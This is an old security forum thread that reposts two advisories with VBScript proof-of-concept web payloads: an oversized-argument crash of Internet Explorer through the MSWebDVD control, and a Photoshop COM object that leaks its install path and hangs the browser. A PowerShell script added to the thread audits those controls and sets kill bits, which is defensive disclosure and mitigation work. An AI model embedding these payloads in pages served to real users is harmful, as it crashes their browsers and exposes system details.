Government Security - Network Security Resources

MSWebDVD Class (mswebdvd.dll) Null Pointer Assignment

Tags: windows, bug, exploit, vulnerability, exploitation, denial of service, patch
This topic is locked. 3 replies to this topic.

#1 qcred11 (First Sergeant, Members, 2,544 posts)

Posted 07 April 2004 - 07:06 AM

Quoted advisory:

Application: MSWebDVD Class (mswebdvd.dll)
Vendors: http://www.microsoft.com
Platforms: Windows XP Professional, SP1, SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser

===============
1) Introduction
===============

"mswebdvd.dll" is a module that allows watching DVD films from websites.
Using active scripting, an "MSWebDVD.MSWebDVD.1" object can be created
and the user can watch online DVD films.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The "mswebdvd.dll" module does not correctly check the parameters that are
being sent to the "AcceptParentalLevelChange" function. Therefore it is
possible to DoS/crash Internet Explorer remotely.

The function:

    Set object = CreateObject("MSWebDVD.MSWebDVD.1")
    object.AcceptParentalLevelChange (boolean value), UserName As String, Password As String

Setting the "Password" value to a string longer than 255 chars will cause
the overflow.

Unfortunately this vulnerability affects all Windows XP versions after all
patches and after SP1+SP2.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<script language=vbscript>
'On Error Resume Next
Dim mymy2, a

' Build the oversized "Password" argument. Each piece is the original payload;
' the pieces are joined with "& _" so that no string literal spans a line break.
a = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
    "AAAAAAAAAAAAAAAAAA" & _
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
    "AAAAAAAAAAAAAAAAAAAAA" & _
    "AAAAAAA"
a = a & "ABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" & _
    "BBBBBBBBBBBBBBBBBBBB" & _
    "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" & _
    "BBBBBBBBBBBBBBBBBBBBB" & _
    "BBBBB"
a = a & "BCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" & _
    "CCCCCCCCCCCCCCCCCCCC" & _
    "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" & _
    "CCCCCCCCCCCCCCCCCCCCC" & _
    "CCCCC"
a = a & "CDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD" & _
    "DDDDDDDDDDDDDDDDDDDD" & _
    "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD" & _
    "DDDDDDDDDDDDDDDDDDDDD" & _
    "DDDDD"
a = a & "DEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" & _
    "EEEEEEEEEEEEEEEEEEEE" & _
    "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" & _
    "EEEEEEEEEEEEEEEEEEEEE" & _
    "EEEEE"
a = a & "EFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" & _
    "FFFFFFFFFFFFFFFFFFFF" & _
    "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" & _
    "FFFFFFFFFFFFFFFFFFFFF" & _
    "FFFFF"
a = a & "FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" & _
    "GGGGGGGGGGGGGGGGGGGG" & _
    "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" & _
    "GGGGGGGGGGGGGGGGGGGGG" & _
    "GGGGG"
a = a & "GHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH" & _
    "HHHHHHHHHHHHHHHHHHHH" & _
    "HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH" & _
    "HHHHHHHHHHHHHHHHHHHHH" & _
    "HHHHH"
a = a & "HIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII" & _
    "IIIIIIIIIIIIIIIIIIII" & _
    "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII" & _
    "IIIIIIIIIIIIIIIIIIIII" & _
    "IIIII"
a = a & "IJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ" & _
    "JJJJJJJJJJJJJJJJJJJJ" & _
    "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ" & _
    "JJJJJJJJJJJJJJJJJJJJJ" & _
    "JJJJJ"
a = a & "JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK" & _
    "KKKKKKKKKKKKKKKKKKKK" & _
    "KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK" & _
    "KKKKKKKKKKKKKKKKKKKKK" & _
    "KKKKK"
a = a & "KLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL" & _
    "LLLLLLLLLLLLLLLLLLLL" & _
    "LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL" & _
    "LLLLLLLLLLLLLLLLLLLLL" & _
    "LLLLL"
a = a & "LMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM" & _
    "MMMMMMMMMMMMMMMMMMMM" & _
    "MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM" & _
    "MMMMMMMMMMMMMMMMMMMMM" & _
    "MMMMM"
a = a & "M1234567899876543211112222333344445555666677778888999998761234rafiistheking" & _
    "ofthebufferoverflows" & _
    "oyoucansuckmydickcauseiamtheinsiderandiamthebestgolookforyou03923610"

' Instantiate the control and pass the oversized string as the Password argument.
Set mymy2 = CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a

</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#2 qcred11 (First Sergeant, Members, 2,544 posts)

Posted 07 April 2004 - 11:28 AM

Almost the same problem was found in Adobe Photoshop 8.0 (CS).
Here is the source and explanation:

Adobe Photoshop 8.0 (CS) - Local Path Disclosure and causing I.E

Application: Adobe Photoshop
Vendors: http://www.adobe.com
Version: 8.0 (CS)
Platforms: Windows
Bug: Local Path Disclosure and D.O.S
Risk: Medium - Denial Of Service
Exploitation: Remote with browser



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Adobe Photoshop is one of the world's best graphic editors.
It has a great set of tools, layer combinations, brushes; amazing software.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Adobe Photoshop registers a lot of COM objects (such as
"Photoshop.Application.8" and "Photoshop.PhotoCDOpenOptions.8"). These
objects are marked as "safe" for scripting. Therefore they can be created
remotely (which is the root of the problem; they should not be!).

Unfortunately, Adobe did not design their object correctly, because upon any
remote creation of a Photoshop object a message pops up saying Adobe Photoshop
security caught "potential tampering with photoshop". However, it also reveals
the local path in which Photoshop was installed, and the Internet Explorer
window stops responding (D.O.S).

For Example:
<script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8" )
</script>

will show where Photoshop is installed, and the
Internet Explorer window stops responding (D.O.S).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8" )
</script>
------------------- CUT HERE -------------------


Or


------------------- CUT HERE -------------------
<script language=vbscript>
dim cooler
Set cooler = CreateObject("Photoshop.PhotoCDOpenOptions.8" )
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
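Both advisories quoted in this thread come down to the same thing: a COM object that Internet Explorer will instantiate from a web page via CreateObject. The standard host-side answer for that class of bug is to check how the ProgID is registered and, if the control has no business being scripted from a browser, to set the kill bit for its CLSID. The script below is an added example written for this thread, not code from either advisory or from Microsoft or Adobe. It assumes the three ProgIDs named above and the registry locations IE reads; the "safe for scripting" category GUIDs and the 0x400 Compatibility Flags value are the documented ones.

```powershell
# Added example for this thread (not from the quoted advisories).
# Audits the ProgIDs named in the thread and can kill-bit them.
# Run on the Windows host being checked; Set-ActiveXKillBit needs an elevated shell.

# ProgIDs taken from the two quoted advisories (list is an assumption of this example).
$ProgIds = @(
    'MSWebDVD.MSWebDVD.1',
    'Photoshop.Application.8',
    'Photoshop.PhotoCDOpenOptions.8'
)

# Component category GUIDs IE consults before scripting/initialising a control.
$CATID_SafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$CATID_SafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'

# Compatibility Flags bit that tells IE never to instantiate the CLSID (the "kill bit").
$KillBit = 0x400

# Both views are checked: the Wow6432Node key is what 32-bit IE on 64-bit Windows reads.
$CompatKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Resolve-ProgIdClsid {
    # Maps a ProgID to its CLSID via HKCR\<ProgID>\CLSID (default value); $null if not registered.
    param([Parameter(Mandatory)][string]$ProgId)
    $key = "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID"
    if (-not (Test-Path $key)) { return $null }
    (Get-Item $key).GetValue('')
}

function Get-ActiveXStatus {
    # Reports whether the ProgID is registered, carries the "safe" categories, and is kill-bitted.
    param([Parameter(Mandatory)][string]$ProgId)
    $clsid = Resolve-ProgIdClsid $ProgId
    if (-not $clsid) {
        return [pscustomobject]@{ ProgId = $ProgId; Clsid = $null; Registered = $false;
                                  SafeForScripting = $false; SafeForInit = $false; KillBitSet = $false }
    }
    $cats   = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\Implemented Categories"
    $killed = $false
    foreach ($base in $CompatKeys) {
        $flags = Get-ItemProperty -Path (Join-Path $base $clsid) -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($flags -and (([int]$flags.'Compatibility Flags' -band $KillBit) -ne 0)) { $killed = $true }
    }
    [pscustomobject]@{
        ProgId           = $ProgId
        Clsid            = $clsid
        Registered       = $true
        SafeForScripting = Test-Path (Join-Path $cats $CATID_SafeForScripting)
        SafeForInit      = Test-Path (Join-Path $cats $CATID_SafeForInitializing)
        KillBitSet       = $killed
    }
}

function Set-ActiveXKillBit {
    # ORs 0x400 into Compatibility Flags for the CLSID in every compatibility view present.
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($base in $CompatKeys) {
        if (-not (Test-Path (Split-Path $base))) { continue }   # no Wow6432Node on 32-bit Windows
        $key = Join-Path $base $Clsid
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $existing = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        $new = [int]$existing -bor $KillBit
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

# Audit first; nothing is changed by this line.
$ProgIds | ForEach-Object { Get-ActiveXStatus $_ } | Format-Table -AutoSize

# Uncomment to kill-bit every ProgID from the list that is actually registered:
# $ProgIds | ForEach-Object { Get-ActiveXStatus $_ } | Where-Object Registered |
#     ForEach-Object { Set-ActiveXKillBit $_.Clsid }
```

Two caveats when reading the audit output. The registry category is only one of the two ways a control can declare itself safe; a control may instead answer IObjectSafety at runtime, so SafeForScripting = False does not prove IE will refuse to script it, whereas KillBitSet = True does. And the kill bit only stops IE and other MSHTML hosts from instantiating the CLSID; the DLL stays registered and usable by every other COM client, which is the intended scope of this mitigation.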



#3 mithsmile (Private, Members, 1 posts)

Posted 28 December 2010 - 09:56 PM

I currently live in an apartment complex and while looking at my router settings I noticed some computers that were accessing the internet through my router (wireless) that weren't supposed to be. I am planning to turn the encryption on, but I wanted to know if there is anything I can do to them before I do. I have their local IP; I just don't know what to do with it.

#4 Edu (First Sergeant, Members, 2,269 posts)

Posted 29 December 2010 - 04:33 PM

Your matter has nothing to do with this topic's subject, not to mention you bumped a six-year-old thread. Please read our rules and create a topic in the "Networking Security" or "Beginners" section so people can help you.
Thanks.

topic closed.